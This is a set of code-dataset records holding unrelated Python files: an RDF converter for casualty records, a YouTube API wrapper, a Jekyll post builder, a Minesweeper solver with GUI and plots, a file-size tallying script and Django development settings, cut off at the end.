entity_uri, row, person_id=None):\n \"\"\"\n Map a single row to RDF.\n\n :param entity_uri: URI of the instance being created\n :param row: tabular data\n :param person_id:\n :return:\n \"\"\"\n row_rdf = Graph()\n row_errors = []\n\n # Loop through the mapping dict and convert data to RDF\n for column_name in self.mapping:\n\n mapping = self.mapping[column_name]\n value = row[column_name]\n\n value = str(value).strip()\n conv_error = None\n original_value = value\n\n converter = mapping.get('converter')\n validator = mapping.get('validator')\n value = converter(value) if converter else value\n conv_error = validator(value, original_value) if validator else None\n\n name = ' '.join(row[1:3])\n\n if conv_error:\n row_errors.append([person_id, name, column_name, conv_error, original_value])\n\n if value not in [None, '']:\n if type(value) == datetime.date:\n rdf_value = Literal(value, datatype=XSD.date)\n elif type(value) == URIRef:\n rdf_value = value\n else:\n rdf_value = Literal(value)\n\n if mapping.get('value_uri_base'):\n rdf_value = URIRef(mapping['value_uri_base'] + value)\n\n row_rdf.add((entity_uri, mapping['uri'], rdf_value))\n\n if row_rdf:\n row_rdf.add((entity_uri, RDF.type, self.instance_class))\n row_rdf = self.convert_graveyards(entity_uri, row_rdf)\n else:\n # Don't create class instance if there is no data about it\n logging.debug('No data found for {uri}'.format(uri=entity_uri))\n row_errors.append([person_id, name, '', 'Ei tietoa henkilöstä', ''])\n\n for error in row_errors:\n self.errors.append(error)\n\n return row_rdf\n\n def convert_graveyards(self, uri, graph: Graph):\n \"\"\"\n Convert graveyard information into URIs. Check if the created URI exists in cemeteries ontology.\n \"\"\"\n mun = graph.value(uri, SCHEMA_CAS.municipality_of_burial)\n if not mun or str(mun) == 'X':\n return graph\n\n gy = graph.value(uri, SCHEMA_CAS.graveyard_number)\n gy_uri = '{base}h{mun}'.format(base=CEMETERIES, mun=str(mun).split('/k')[-1])\n # mun_uri = '{base}k{mun}'.format(base=KUNNAT, mun=mun)\n if gy:\n gy_uri += '_{gy}'.format(gy=gy)\n else:\n return graph\n\n gy_uri = URIRef(GRAVEYARD_MAPPING.get(gy_uri, gy_uri))\n\n if gy_uri not in self.cemeteries:\n logging.info('Cemetery {gy} not found for person {p}'.format(gy=gy_uri, p=uri))\n return graph\n\n if str(gy).isnumeric():\n graph.add((uri, SCHEMA_WARSA.buried_in, gy_uri))\n\n graph.remove((uri, SCHEMA_CAS.graveyard_number, gy))\n\n return graph\n\n def read_csv(self, csv_input):\n \"\"\"\n Read in a CSV files using pandas.read_csv\n\n :param csv_input: CSV input (filename or buffer)\n \"\"\"\n def strip_upper(value):\n return value.strip().upper() if value else None\n\n def stripper(value):\n return value.strip() if value != '' else None\n\n def x_stripper(value):\n return value.strip() if value.strip() not in ['x', ''] else None\n\n csv_data = pd.read_csv(csv_input, encoding='UTF-8', index_col=False, sep=',', quotechar='\"',\n # parse_dates=[1], infer_datetime_format=True, dayfirst=True,\n na_values=[' '],\n converters={\n 'AMMATTI': lambda x: x.lower().strip(),\n 'ASKUNTA': x_stripper,\n 'KIRJKUNTA': x_stripper,\n 'HAAVKUNTA': x_stripper,\n 'KATOKUNTA': x_stripper,\n 'KUOLINKUNTA': x_stripper,\n 'SKUNTA': x_stripper,\n 'HKUNTA': x_stripper,\n 'HMAA': stripper,\n 'HPAIKKA': stripper,\n 'KANSALLISUUS': strip_upper,\n 'KANSALAISUUS': strip_upper,\n 'LASTENLKM': stripper,\n 'JOSKOODI': stripper,\n 'JOSNIMI': stripper,\n # 0: lambda x: int(x) if x and x.isnumeric() else -1\n })\n\n self.table = csv_data.fillna('').applymap(lambda x: x.strip() if type(x) == str else x)\n logging.info('Read {num} rows from CSV'.format(num=len(self.table)))\n self.log.info('Data read from CSV %s' % csv_input)\n\n def serialize(self, destination_data, destination_schema):\n \"\"\"\n Serialize RDF graphs\n\n :param destination_data: serialization destination for data\n :param destination_schema: serialization destination for schema\n :return: output from rdflib.Graph.serialize\n \"\"\"\n bind_namespaces(self.data)\n bind_namespaces(self.schema)\n\n data = self.data.serialize(format=\"turtle\", destination=destination_data)\n schema = self.schema.serialize(format=\"turtle\", destination=destination_schema)\n self.log.info('Data serialized to %s' % destination_data)\n self.log.info('Schema serialized to %s' % destination_schema)\n\n return data, schema # Return for testing purposes\n\n def process_rows(self):\n \"\"\"\n Loop through CSV rows and convert them to RDF\n \"\"\"\n for index in self.table.index:\n person_id = self.table.ix[index][0]\n person_uri = DATA_CAS['p' + str(person_id)]\n row_rdf = self.map_row_to_rdf(person_uri, self.table.ix[index][1:], person_id=person_id)\n if row_rdf:\n self.data += row_rdf\n\n for prop in self.mapping.values():\n self.schema.add((prop['uri'], RDF.type, RDF.Property))\n if 'name_fi' in prop:\n self.schema.add((prop['uri'], SKOS.prefLabel, Literal(prop['name_fi'], lang='fi')))\n if 'name_en' in prop:\n self.schema.add((prop['uri'], SKOS.prefLabel, Literal(prop['name_en'], lang='en')))\n if 'description_fi' in prop:\n self.schema.add((prop['uri'], DCT.description, Literal(prop['description_fi'], lang='fi')))\n\n error_df = pd.DataFrame(columns=['nro', 'nimi', 'sarake', 'virhe', 'arvo'], data=self.errors)\n error_df.to_csv('output/errors.csv', ',', index=False)\n\n\nif __name__ == \"__main__\":\n\n argparser = argparse.ArgumentParser(description=\"Process casualties CSV\", fromfile_prefix_chars='@')\n\n argparser.add_argument(\"input\", help=\"Input CSV file\")\n argparser.add_argument(\"cemeteries\", help=\"Input cemeteries turtle file\")\n argparser.add_argument(\"--outdata\", help=\"Output file to serialize RDF dataset to (.ttl)\", default=None)\n argparser.add_argument(\"--outschema\", help=\"Output file to serialize RDF schema to (.ttl)\", default=None)\n argparser.add_argument(\"--loglevel\", default='INFO', help=\"Logging level, default is INFO.\",\n choices=[\"NOTSET\", \"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"CRITICAL\"])\n\n args = argparser.parse_args()\n\n cemetery_uris = list(Graph().parse(args.cemeteries, format='turtle').subjects())\n mapper = RDFMapper(CASUALTY_MAPPING, SCHEMA_WARSA.DeathRecord, cemeteries=cemetery_uris,\n loglevel=args.loglevel.upper())\n mapper.read_csv(args.input)\n\n mapper.process_rows()\n\n mapper.serialize(args.outdata, args.outschema)\n","sub_path":"src/csv_to_rdf.py","file_name":"csv_to_rdf.py","file_ext":"py","file_size_in_byte":9086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"188158880","text":"from txgoogleapi.base import GoogleApi, GoogleApiEndPoint, SET, BOOL, INT\n\n\nclass Playlists(GoogleApiEndPoint):\n _url = '/playlists'\n _methods = {\n 'list': {\n 'method': 'GET',\n 'required': {\n 'part': SET('id', 'snippet', 'status'),\n },\n 'filter': {\n 'channelId': str,\n 'id': str,\n 'mine': BOOL,\n },\n 'optional': {\n 'maxResults': INT,\n 'onBehalfOfContentOwner': str,\n 'onBehalfOfContentOwnerChannel': str,\n 'pageToken': str\n },\n },\n 'insert': {\n 'method': 'POST',\n 'required': {\n 'part': SET('snippet', 'status'),\n },\n 'optional': {\n 'onBehalfOfContentOwner': str,\n 'onBehalfOfContentOwnerChannel': str,\n },\n },\n 'update': {\n 'method': 'PUT',\n 'required': {\n 'part': SET('snippet', 'status'),\n },\n 'optional': {\n 'onBehalfOfContentOwner': str,\n },\n },\n 'delete': {\n 'method': 'DELETE',\n 'required': {\n 'id': str,\n },\n 'optional': {\n 'onBehalfOfContentOwner': str,\n },\n },\n }\n\n\nclass PlaylistItems(GoogleApiEndPoint):\n _url = '/playlistItems'\n _methods = {\n 'list': {\n 'method': 'GET',\n 'required': {\n 'part': SET('id', 'snippet', 'contentDetails', 'status'),\n },\n 'filter': {\n 'id': str,\n 'playlistId': str,\n },\n 'optional': {\n 'maxResults': INT,\n 'onBehalfOfContentOwner': str,\n 'pageToken': str,\n 'videoId': str,\n },\n },\n 'insert': {\n 'method': 'POST',\n 'required': {\n 'part': SET('snippet', 'contentDetails', 'status'),\n },\n 'optional': {\n 'onBehalfOfContentOwner': str,\n },\n },\n 'update': {\n 'method': 'PUT',\n 'required': {\n 'part': SET('snippet', 'contentDetails', 'status'),\n },\n },\n 'delete': {\n 'method': 'DELETE',\n 'required': {\n 'id': str,\n },\n },\n }\n\n\nclass YoutubeV3(GoogleApi):\n _url = '/youtube/v3'\n _apis = {\n 'playlists': Playlists,\n 'playlistItems': PlaylistItems,\n }\n","sub_path":"txgoogleapi/youtube_v3.py","file_name":"youtube_v3.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"86989492","text":"import argparse\nimport csv\nimport dateutil.parser\nimport os\nimport re\n\nparser = argparse.ArgumentParser(description='Build jekyll posts')\nparser.add_argument('input', help='csv file with post variables')\nparser.add_argument('template', help='string template for making posts')\nparser.add_argument('output', help='output directory')\n\nif __name__ == '__main__':\n args = parser.parse_args()\n\n with open(args.template) as fin:\n template = fin.read()\n\n with open(args.input) as fin:\n for row in csv.DictReader(fin):\n date = dateutil.parser.parse(row['date'])\n title = re.sub(r'\\W+', '-', row['title'].lower())\n filename = (args.output + '/' + date.strftime('%Y-%m-%d-') +\n title + '.md')\n if not os.path.exists(os.path.dirname(filename)):\n try:\n os.makedirs(os.path.dirname(filename))\n except OSError as exc: # Guard against race condition\n if exc.errno != errno.EEXIST:\n raise\n with open(filename, 'w') as fout:\n fout.write(template.format(**row))\n","sub_path":"_postbuilder/postbuilder.py","file_name":"postbuilder.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"362963351","text":"def cluster_config(flags):\n\tDEFAULT_PORT = 6777\n\tn_nodes, node_id, n_ps = flags.n_nodes, flags.node_id, flags.n_ps\n\tconfig = {}\n\tconfig['ps_hosts'] = ['master:%d' % DEFAULT_PORT]\n\tconfig['worker_hosts'] = []\n\thost_base = 'node0'\n\tfor i in range(1, n_nodes):\n\t\tif i < n_ps:\n\t\t\tn_str = str(i) if i >= 10 else '0' + str(i)\n\t\t\tconfig['ps_hosts'].append(host_base + n_str + ':' + str(DEFAULT_PORT + i))\n\t\telse:\n\t\t\tn_str = str(i) if i >= 10 else '0' + str(i)\n\t\t\tconfig['worker_hosts'].append(host_base + n_str + ':' + str(DEFAULT_PORT + i))\n\n\tif node_id < n_ps:\n\t\tconfig['job'] = 'ps'\n\t\tconfig['task_id'] = node_id\n\telse:\n\t\tconfig['job'] = 'worker'\n\t\tconfig['task_id'] = node_id - n_ps\n\n\treturn config","sub_path":"ignore/new/cartpole/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"217883883","text":"import random\nimport sys\nimport tkinter as tk\nimport math\nimport matplotlib.pyplot as plt\nimport datetime as t\nfrom threading import Thread\n\n# increasing recusrion limit\nsys.setrecursionlimit(100000)\n\n\nclass MineSweeper1(object):\n \"\"\"\n In this class, Actual computation and minesweeper generation takes place\n This class creates the basic layout of the minesweeper board using the constructor. It checks if the opened cell is\n safe (S) or a mine (M) and updates the information for each cell accordingly, until all the cells are opened.\n \"\"\"\n\n # Constructor with 3 arguments, size of minesweeper, the mine density and the mode\n def __init__(self, size, mdensity, mode):\n self.size = size\n self.mode = mode\n self.mdensity = mdensity\n\n # Creates the minesweeper board\n self.cells = set((x, y)\n for x in range(self.size)\n for y in range(self.size))\n\n # Getting number of mines\n mines_number = self.getmines()\n self._mines = set() # to keep track of the mines detected by the agent\n # Setting mines at random locations\n while len(self._mines) < mines_number:\n self._mines.add((random.randrange(size),\n random.randrange(size)))\n\n # For each square, gives the set of its neighbours\n # ni = not identified\n # neighbour = List of neighbors\n # neighbours = Length of neighbors\n # Status = Status of cell (It can be C = Covered, M = Mined, S = Safe)\n # Clue = Provides number of mines around specific locations\n self.data = {} # data to keep track of required parameters\n for (x, y) in self.cells: # for all the cells in the board, get their neighbors and update each cell's data\n neighbour = self.getneighbour(x, y)\n self.data[x, y] = {\"neighbour\": neighbour, \"neighbours\": len(neighbour), \"status\": \"C\", \"clue\": \"ni\"}\n # Environment data:\n self.empty_remaining = size * size - mines_number # number of non-mines\n # Maintain list of opened cells.\n self.opened = set()\n # flags the identified mine.\n self.flagged = set()\n # Maintain list of safe cells to generate hints.\n self.safe = []\n # Keep track of mines for which all neighbors have been identified\n self.solved = set()\n # If it was a mine, it will be 'mine' instead of a number.\n self.mines_busted = set()\n\n def open(self, xy):\n \"\"\"\n Opens the cell at (x, y) location and checks whether it is a mine or safe\n \"\"\"\n if xy in self.opened: # if the cell is already open, do nothing\n return\n\n self.opened.add(xy) # add to the list of opened cells\n if xy in self._mines: # if mine, update status to M\n self.mines_busted.add(xy) # add to mines busted\n self.data.get(xy)[\"status\"] = \"M\"\n else:\n # Updating the clue\n self.data.get(xy)[\"status\"] = \"S\" # otherwise update status as safe\n # Updating clue based on mines found in the cell's neighbors\n self.data.get(xy)[\"clue\"] = len(self.data[xy].get(\"neighbour\") & self._mines)\n self.empty_remaining -= 1 # decrease number of non-mines by 1\n # Checking the condition of winning for test mode, displays the winning scenario\n if self.empty_remaining <= 0 and self.mode == \"T\":\n self.win()\n\n def flag(self, xy):\n \"\"\"\n function to flag (mark) the cell denoted by xy\n \"\"\"\n self.flagged.add(xy) # adds the cell to the flagged set\n\n def getneighbour(self, x, y):\n \"\"\"\n returns the list of neighbors for the cell (x, y)\n \"\"\"\n # Check to the left and right of that cell to retrieve its neighbors and return them\n neigh = set((nx, ny) for nx in [x - 1, x, x + 1] for ny in [y - 1, y, y + 1] if (nx, ny) != (x, y) if\n (nx, ny) in self.cells)\n return neigh\n\n def getmines(self):\n \"\"\"\n returns the number of mines based on the user input size of the minesweeper board\n \"\"\"\n # Number of mines is determined by (mine density * size of the board)\n return math.floor(self.mdensity * (self.size ** 2))\n\n def updateinformation(self):\n \"\"\"\n updates the information for the cells in the board\n \"\"\"\n # for all the cells in the board except the busted mines and flagged cells\n for (x, y) in (self.cells - self.mines_busted - self.flagged):\n if self.data.get((x, y)).get(\"clue\") != \"ni\": # if the clue for the cell is not ni (not identified)\n # Number of hidden cells around (x, y)\n hidden = 0\n # List of hidden cells around (x, y)\n hiddenlist = set()\n # Number of safe cells around (x, y)\n safe = 0\n # List of safe cells around (x, y)\n safelist = set()\n # Number of mine cells around (x, y)\n mine = 0\n # List of mine cells around (x, y)\n minelist = set()\n\n # Iterating over each neighbor of (x, y) to update the above mentioned list\n for n in self.data.get((x, y)).get(\"neighbour\"):\n if self.data.get(n).get(\"status\") == \"C\": # if the status of the cell is covered\n hidden += 1 # increase number of hidden cells\n hiddenlist.add(n) # add the cell to the hidden list\n elif self.data.get(n).get(\"status\") == \"S\": # if the status of the cell is safe, add to safelist\n safe += 1 # update no of safe cells\n safelist.add(n)\n elif self.data.get(n).get(\"status\") == \"M\": # if the cell is a mine, add to minelist\n mine += 1 # update no of mines detected\n minelist.add(n)\n\n # If total number of remaining mines around cell (x,y) equals to total number of hidden cells around\n # (x, y), then it implies that all hidden cells around x, y are mines.\n if hiddenlist: # if cells exist in hiddenlist\n # if the clue minus current number of mines detected is equal to the current number of hidden cells\n if self.data.get((x, y)).get(\"clue\") - mine == hidden:\n for sn in hiddenlist:\n self.data.get(sn)[\"status\"] = \"M\" # update all those cells as mines\n # Adding identified mines and flagging it\n self.flag(sn)\n # If all mines around x,y have been identified, then all the remaining hidden cells around x, y\n # are safe.\n elif (self.data.get((x, y)).get(\"neighbours\") - self.data.get((x, y)).get(\"clue\")) - safe == hidden:\n for sn in hiddenlist:\n self.data.get(sn)[\"status\"] = \"S\"\n # Adding identified safe cells to the list\n if sn not in self.opened and sn not in self.safe:\n self.safe.append(sn)\n else: # otherwise add cell to the solved list\n self.solved.add((x, y))\n # Based on updated information, calling method to generate hint\n return self.generatehint()\n\n def generatehint(self):\n \"\"\"\n function to generate a hint for the game to proceed, returns the next step for the agent to take\n \"\"\"\n\n # If safe list is not empty, give first element in safe list as a hint\n if self.safe: # if safe\n step = self.safe.pop(0) # remove the first element from the list\n else:\n # get remaining cells excluding the opened and flagged cells\n permittedsteps = self.cells - self.opened - self.flagged # get remaining cells excluding the opened and flagged cells\n step = random.choice(list(permittedsteps)) # from these cells, choose one randomly\n\n return step\n\n def win(self):\n \"\"\"\n Display final score after game is completed. final score is #mines flagged/# mines\n \"\"\"\n # Total number of mines busted by user while playing\n if self.mines_busted:\n print(\"You finished with %s tripped mines. Final score %s\" % (\n len(self.mines_busted), len(self.flagged) / len(self._mines)))\n\n\nclass MineSweeperPlay(MineSweeper1):\n \"\"\"\n Play the Minesweeper game!\n This class automates the Minesweeper gameplay for the above class using the Tkinter library.\n If the mode is Test, the result is displayed.\n \"\"\"\n\n # Constructor\n def __init__(self, *args, **kw):\n # Calling MAIN CLASS\n MineSweeper1.__init__(self, *args, **kw) # use the __init__ function from the above class to create the board\n\n def letsplay(self):\n \"\"\"\n plays the game; starts timer and runs until all cells are opened and returns the time taken in microseconds\n \"\"\"\n start_time = t.datetime.now() # Noting time taken for the game to complete\n while self.empty_remaining > 0: # until all cells are opened\n step = self.updateinformation() # update the information for the cell\n self.open(step) # and open that cell\n # return the final results\n return len(self._mines), len(self.flagged), len(self.mines_busted), (t.datetime.now() - start_time).microseconds\n\n def display(self):\n \"\"\"\n displays the GUI for the game, using the Tkinter library\n \"\"\"\n\n # Creating window and adding properties to it\n window = tk.Tk()\n table = tk.Frame(window)\n table.pack()\n squares = {}\n\n # Build buttons\n for xy in self.cells: # for all the cells\n squares[xy] = button = tk.Button(table, padx=0, pady=0) # create buttons for all cells\n row, column = xy\n # expand button to North, East, West, South\n button.grid(row=row, column=column, sticky=\"news\")\n\n # Scaling the size of button based on the size of minesweeper board\n scale = math.floor(50 // (1 if self.size // 10 == 0 else self.size // 10))\n table.grid_columnconfigure(column, minsize=scale)\n table.grid_rowconfigure(row, minsize=scale)\n # needed to restore bg to default when unflagging\n self.refresh(xy, squares)\n\n # Displaying final score\n window.title(\"You finished with %s tripped mines. Final score %s\" % (\n len(self.mines_busted), len(self.flagged) / len(self._mines)))\n window.mainloop()\n\n def refresh(self, xy, squares):\n \"\"\"\n Update the GUI for given square\n \"\"\"\n button = squares[xy]\n\n # Fetching and setting visual data for the cell\n text, fg, bg = self.getvisualdataforcell(xy)\n button.config(text=text, fg=fg, bg=bg)\n\n # Updating information for button if it is opened and setting it with a sunken effect\n if xy in self.opened:\n button.config(relief=tk.SUNKEN)\n\n def getvisualdataforcell(self, xy):\n \"\"\"\n Fetching Visual data for cell based on its status\n \"\"\"\n # If cell is opened and it is mine, it will be marked as a mine. Else, the clue will be displayed.\n if xy in self.opened:\n if xy in self._mines:\n return u'\\N{SKULL AND CROSSBONES}', None, 'red'\n\n mn = self.data.get(xy).get(\"clue\")\n if mn >= 0:\n # Standard minesweeper colors\n fg = {0: 'black', 1: 'blue', 2: 'dark green', 3: 'red',\n 4: 'dark blue', 5: 'dark red',\n }.get(mn, 'black')\n return str(mn), fg, 'white'\n\n # if xy is in flagged\n elif xy in self.flagged:\n # display a white flag\n return u'\\N{WHITE FLAG}', None, 'green'\n # For remaining cells, they will be just green\n elif xy in self._mines:\n self.flagged.add(xy)\n return u'\\N{WHITE FLAG}', None, 'green'\n else:\n # display green cell\n return '', None, 'green'\n\n\ndef disp_data(data, varnames, xlabel, ylabel, title):\n \"\"\"\n This method is used to visualize data by displaying the graph\n :param data: data to be plotted\n :param varnames: variables to be plotted\n :param xlabel: x label\n :param ylabel: y label\n :param title: title\n \"\"\"\n\n # using the matplotlib library to plot the graphs\n fig = plt.figure() # Initializing figure\n ax1 = fig.add_subplot()\n ax1.set_xlabel(xlabel)\n ax1.set_ylabel(ylabel)\n ax1.set_title(title)\n thiningfactors = list(data.keys()) # get the keys from the data dictionary\n\n for var in varnames: # for all the variables to be plotted\n success = list(map(lambda key: round(data.get(key).get(var)), data.keys()))\n ax1.plot(thiningfactors, success, label=var)\n ax1.legend(title=\"Mines\") # create legends for the graphs\n ax1.grid(True) # add grid to the graphs\n\n\ndef main(cls):\n \"\"\"\n Main function to either play the Minesweeper game, or analyze the performance of the player\n \"\"\"\n # This is used to either analyze the basic minesweeper board or test it\n Mode = input(\"Select the mode (Analysis/Test) \")\n # if mode is Analysis\n if \"analysis\".casefold().__eq__(Mode.casefold()):\n # initalize the parameters\n result = {}\n sizes = [30, 40, 50, 60]\n mdenisty = 0.40\n iterations = 5\n print(\"Generating Data\")\n # for the sizes defined above\n for size in sizes:\n # Avg total number of mines\n meanmines = 0\n # Avg total number of flagged mines\n meanflagged = 0\n # Avg total number of busted mines\n meanbusted = 0\n # Avg time taken\n meantimetaken = 0\n # Plays the game \"iterations\" number of times\n for i in range(0, iterations):\n game = cls(size, mdenisty, \"A\")\n # getting the total number of mines, total flagged cells, busted mines and time take once the game is done\n tmines, tflagged, tbusted, timetaken = game.letsplay()\n # Update meanmines, meanflagged, meanbusted, meantimetaken accordingly\n meanmines += tmines\n meanflagged += tflagged\n meanbusted += tbusted\n meantimetaken += round(timetaken / (10 ** 3), 4)\n result[size] = {\"meanmines\": math.floor(meanmines / iterations), \"meanflagged\": math.floor(meanflagged / iterations),\n \"meanbusted\": math.floor(meanbusted / iterations),\n \"meantimetaken\": math.floor(meantimetaken / iterations)}\n print(\"Plotting Data\")\n # displays the graph for the parameters mentioned above\n disp_data(result, [\"meanmines\", \"meanflagged\", \"meanbusted\"], \"Sizes\", \"Numbers\", \"Size vs efficiency\")\n disp_data(result, [\"meantimetaken\"], \"Sizes\", \"Time( MilliSeconds )\", \"Size vs Time taken\")\n plt.show()\n else: # if the mode is Test\n # Ask user for input size\n size = int(input(\"Enter the size \"))\n mdensity = float(input(\"Enter the mine density (0 - 1) \"))\n game = cls(size, mdensity, \"T\")\n # Play the game and display the board\n game.letsplay()\n game.display()\n\n\nif __name__ == '__main__':\n # Runs the main function\n main(MineSweeperPlay)\n","sub_path":"Project2/MineSweeper1.py","file_name":"MineSweeper1.py","file_ext":"py","file_size_in_byte":15859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"268467213","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2017-07-18 14:04:11\n# @Author : lzg (wb-lzg228465@autonavi.com)\n# @Link : ${link}\n# @Version : $Id$\n\nimport os\nimport sys\nimport csv\n\n\ndef main():\n value = {}\n value_1 = {}\n allsize = 0.0\n allnu = 0\n strl = \"\"\n # arg = sys.argv\n # print(arg[1])\n arg = {}\n with open('./config.ini', \"r\") as fileobject:\n i = 0\n for line in fileobject:\n i = i + 1\n arg[i] = line\n print(\"检索目录:%s,输出目录:%s;\" % (arg[1][:-1], arg[2]))\n # r'D:\\big_box\\data\\PDB2.3.2\\JP\\LOADABLE'\n for parent, dirnames, filenames in os.walk(arg[1][:-1]):\n for filename in filenames:\n currentpath = os.path.join(parent, filename)\n filesize = os.path.getsize(currentpath)\n temp = 0.0\n temp_1 = 0\n if filename in value:\n temp = value[filename]\n temp_1 = value_1[filename]\n value[filename] = temp + filesize / 1024 / 1024\n value_1[filename] = temp_1 + 1\n # for line in value:\n # print(line[:-4])\n # allsize = allsize + value[line]\n # allnu = allnu + value_1[line]\n # strl = strl + line[:-4] + \" \" + value_1[line] + str(value[line]) + \"\\n\"\n # r'E:\\大客户\\文档\\规则需求\\发布资料\\test.txt'\n with open(arg[2], \"w\", newline=\"\") as fobj:\n # fobj.write(strl)\n writer = csv.writer(fobj)\n writer.writerow([\"序号\", \"模块\", \"数量\", \"大小/Mb\"])\n i = 0\n for line in value:\n allsize = allsize + value[line]\n allnu = allnu + value_1[line]\n i = i + 1\n writer.writerow(\n [str(i), line[:-4], str(value_1[line]), str(value[line])])\n\n writer.writerow([str(i + 1), \"总数\", str(allnu), str(allsize)])\n # with open(arg[2], \"a\") as fobj1:\n # strl = \"allsize\" + \" \" + str(allsize)\n # fobj1.write(strl)\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/20170718-1.py","file_name":"20170718-1.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"456048765","text":"# -*- coding: utf-8\n\"\"\"\nDjango settings for jobtrak project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nSECRET_KEY = 'wv9o)z07uyra13e4(c9d%6djiyjr$h7&b8y3&6z_+%r4m7+8(u'\n\nDEBUG = True\n\n# TEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\nINSTALLED_APPS = (\n\t'grappelli',\n\t'django.contrib.admin',\n#\t'django.contrib.admin.apps.SimpleAdminConfig',\n\t'django.contrib.admindocs',\n\t'django.contrib.auth',\n\t'django.contrib.contenttypes',\n\t'django.contrib.sessions',\n\t'django.contrib.messages',\n\t'django.contrib.staticfiles',\n\t'django.contrib.humanize',\n\t'django_extensions',\n\t'bootstrap3',\n\t'taggit',\n\t'django_tables2',\n\t'external_urls',\n\t'mmg.jobtrak.util',\n\t'mmg.jobtrak.core',\n\t'mmg.jobtrak.links',\n\t'mmg.jobtrak.contact',\n\t'mmg.jobtrak.cms',\n\t'mmg.jobtrak.public',\n\t'mmg.jobtrak.profile',\n\t'mmg.jobtrak.help',\n)\n\nROOT_URLCONF = 'JobTrak.urls'\n\nWSGI_APPLICATION = 'JobTrak.wsgi.application'\n\nMIDDLEWARE_CLASSES = (\n\t'django.contrib.sessions.middleware.SessionMiddleware',\n\t'django.middleware.common.CommonMiddleware',\n\t'django.middleware.csrf.CsrfViewMiddleware',\n\t'django.contrib.auth.middleware.AuthenticationMiddleware',\n\t'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n\t'django.contrib.messages.middleware.MessageMiddleware',\n\t'django.middleware.clickjacking.XFrameOptionsMiddleware',\n\t'django.contrib.admindocs.middleware.XViewMiddleware',\n\t'django.middleware.locale.LocaleMiddleware',\n)\n\nBOOTSTRAP3 = {\n\t'jquery_url': '//code.jquery.com/jquery.min.js',\n\t'base_url': '//netdna.bootstrapcdn.com/bootstrap/3.3.1/',\n\t'css_url': None,\n\t'theme_url': None,\n\t'javascript_url': None,\n\t'javascript_in_head': False,\n\t'include_jquery': False,\n\t'horizontal_label_class': 'col-md-2',\n\t'horizontal_field_class': 'col-md-4',\n\t'set_required': True,\n\t'set_placeholder': True,\n\t'required_css_class': '',\n\t'error_css_class': 'has-error',\n\t'success_css_class': 'has-success',\n\t'formset_renderers':{\n\t\t'default': 'bootstrap3.renderers.FormsetRenderer',\n\t},\n\t'form_renderers': {\n\t\t'default': 'bootstrap3.renderers.FormRenderer',\n\t},\n\t'field_renderers': {\n\t\t'default': 'bootstrap3.renderers.FieldRenderer',\n\t\t'inline': 'bootstrap3.renderers.InlineFieldRenderer',\n\t},\n}\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(BASE_DIR,'files','templates'),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.template.context_processors.i18n',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': 'postgres',\n 'USER': 'postgres',\n 'PASSWORD': 'postgres',\n 'HOST': 'db',\n 'PORT': 5432,\n }\n}\n\nLANGUAGE_CODE = 'en'\nTIME_ZONE = 'America/New_York'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nUSE_THOUSAND_SEPARATOR = True\n\n# LANGUAGE_COOKIE_NAME = 'jobtrak_l'\n# CSRF_COOKIE_NAME = 'jobtrak_c'\n# SESSION_COOKIE_NAME = 'jobtrak_s'\n\nGRAPPELLI_ADMIN_TITLE = \"JobTrak\"\nGRAPPELLI_AUTOCOMPLETE_LIMIT = 10\nGRAPPELLI_SWITCH_USER = True\n\nugettext = lambda s: s\n\nLANGUAGES = (\n\t('de', u'Deutsch'),\n\t('nl', u'Dutch'),\n\t('en', u'English'),\n\t('es', u'Español'),\n\t('fi', u'Finnish'),\n\t('fr', u'Français'),\n\t('it', u'Italian'),\n\t('sv', u'Swedish'),\n\t('tr', u'Türkçe'),\n)\n\nLOCALE_PATHS = (\n\tos.path.join(BASE_DIR,'files','locale'),\n\tos.path.join(BASE_DIR,'mmg','jobtrak','cms'),\n\tos.path.join(BASE_DIR,'mmg','jobtrak','contact'),\n\tos.path.join(BASE_DIR,'mmg','jobtrak','core'),\n\tos.path.join(BASE_DIR,'mmg','jobtrak','help'),\n\tos.path.join(BASE_DIR,'mmg','jobtrak','links'),\n\tos.path.join(BASE_DIR,'mmg','jobtrak','profile'),\n\tos.path.join(BASE_DIR,'mmg','jobtrak','public'),\n\tos.path.join(BASE_DIR,'mmg','jobtrak','util'),\n)\n\n\nSTATICFILES_DIRS = (\n\t('libs',os.path.join(BASE_DIR,'libs')),\n)\n\nSTATICFILES_FINDERS = (\n\t'django.contrib.staticfiles.finders.FileSystemFinder',\n\t'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\nSTATIC_ROOT = os.path.join(BASE_DIR,'files','static')\nSTATIC_URL = '/static/'\n\nMEDIA_ROOT = os.path.join(BASE_DIR,'files','media')\nMEDIA_URL = 